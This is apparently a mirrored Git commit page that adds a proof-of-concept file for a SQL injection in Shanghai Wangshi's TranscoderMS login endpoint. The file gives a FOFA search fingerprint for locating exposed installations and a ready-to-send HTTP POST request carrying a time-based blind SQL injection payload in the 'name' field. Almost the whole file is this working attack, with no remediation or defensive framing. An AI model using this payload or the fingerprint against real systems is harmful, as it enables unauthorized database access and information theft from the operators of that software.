admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-04 18:06:34 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 上海网仕科技TranscoderMS index存在SQL注入.md

Browse Source
This commit is contained in:
Rainyseason 2025-09-01 16:14:00 +08:00 committed by GitHub
parent 3462196bb8
commit 3acd08d766
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 17 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
wpoc/上海网仕科技/上海网仕科技TranscoderMS index存在SQL注入.md Normal file
View File

@ -0,0 +1,17 @@
# 上海网仕科技TranscoderMS index存在SQL注入
上海网仕科技存在未授权访问sql漏洞易造成信息泄露
## fofa
```
"webtrans//js/md5-min.js"
```
## poc
```javascript
POST /webtrans/index.php?controller=user&action=login HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
name=test111;') AND (SELECT 1 FROM (SELECT(SLEEP(5)))xSEI) AND ('aFKS'='aFKS&pass=MTExMTExMTExMTExMTExMTExMTExMTExMTEx&lang=zh_CN
```